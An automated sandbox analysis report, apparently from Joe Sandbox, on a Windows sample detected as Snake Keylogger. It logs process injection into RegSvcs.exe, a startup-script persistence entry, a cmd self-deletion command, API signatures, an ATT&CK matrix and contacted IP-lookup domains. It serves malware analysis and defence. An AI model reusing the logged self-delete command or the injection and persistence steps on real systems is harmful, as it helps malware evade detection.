Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 41F008			Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DF4008			Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AF87B1 LogonUserW,

0_2_00AF87B1

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00AA3B3A

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA48D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

0_2_00AA48D7

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00B04C27 mouse_event,

0_2_00B04C27

Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\MBOaS3GRtF.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\Anglophile\supergroup.exe "C:\Users\user\AppData\Local\Anglophile\supergroup.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Anglophile\supergroup.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3	Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AF7CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_00AF7CAF

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AF874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00AF874B

Source: MBOaS3GRtF.exe, supergroup.exe.0.dr	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: MBOaS3GRtF.exe, supergroup.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AC862B cpuid

0_2_00AC862B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AD4E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00AD4E87

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AE1E06 GetUserNameW,

0_2_00AE1E06

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AD3F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_00AD3F3A

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Code function: 0_2_00AA49A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_00AA49A0

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8144, type: MEMORYSTR

Source: supergroup.exe	Binary or memory string: WIN_81
Source: supergroup.exe	Binary or memory string: WIN_XP
Source: supergroup.exe	Binary or memory string: WIN_XPe
Source: supergroup.exe	Binary or memory string: WIN_VISTA
Source: supergroup.exe	Binary or memory string: WIN_7
Source: supergroup.exe	Binary or memory string: WIN_8
Source: supergroup.exe.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.supergroup.exe.1890000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.620000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.supergroup.exe.32a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: supergroup.exe PID: 7744, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7764, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: supergroup.exe PID: 8100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 8144, type: MEMORYSTR

Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B16283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	0_2_00B16283
Source: C:\Users\user\Desktop\MBOaS3GRtF.exe	Code function: 0_2_00B16747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	0_2_00B16747
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00236283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	2_2_00236283
Source: C:\Users\user\AppData\Local\Anglophile\supergroup.exe	Code function: 2_2_00236747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	2_2_00236747

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	2 Valid Accounts	2 Native API	111 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	21 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	3 Clipboard Data	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 DLL Side-Loading	NTDS	126 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	212 Process Injection	1 Masquerading	LSA Secrets	231 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	2 Valid Accounts	Cached Domain Credentials	11 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Virtualization/Sandbox Evasion	DCSync	2 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	212 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
MBOaS3GRtF.exe	69%	Virustotal		Browse
MBOaS3GRtF.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject
MBOaS3GRtF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Anglophile\supergroup.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Anglophile\supergroup.exe	74%	ReversingLabs	Win32.Trojan.AutoitInject

Source	Detection	Scanner	Label	Link
http://checkip.dyndns.orgp	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.64.1	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false		high
https://reallyfreegeoip.org/xml/8.46.123.189	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027F5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002718000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ECB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.orgp	RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://checkip.dyndns.com	RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.micro	RegSvcs.exe, 00000003.00000002.1573554245.0000000005B40000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegSvcs.exe, 00000003.00000002.1571555540.0000000002661000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	supergroup.exe, 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, supergroup.exe, 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000276E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	false		high
http://reallyfreegeoip.org	RegSvcs.exe, 00000003.00000002.1571555540.00000000027E7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002815000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002743000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.0000000002823000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F94000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002F6A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002EEF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	supergroup.exe, 00000002.00000002.1396859862.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1571555540.000000000272B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.1569174636.0000000000622000.00000040.80000000.00040000.00000000.sdmp, supergroup.exe, 00000006.00000002.1565558570.0000000001890000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.1730351913.0000000002ED7000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States		16989	UTMEMUS	false
104.21.64.1	reallyfreegeoip.org	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588656
Start date and time:	2025-01-11 03:44:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	MBOaS3GRtF.exe renamed because original name is a hash value
Original Sample Name:	d9f1e70cd9264c96526b79da353f0d2650c4019bc7e38bc42fc8d2ff88ffb807.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@20/7@2/2
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 100% Number of executed functions: 62 Number of non-executed functions: 274
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 52.149.20.212
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegSvcs.exe, PID 7764 because it is empty
Execution Graph export aborted for target RegSvcs.exe, PID 8144 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:45:17	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\supergroup.vbs
21:45:17	API Interceptor	236x Sleep call for process: RegSvcs.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	fpIGwanLZi.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
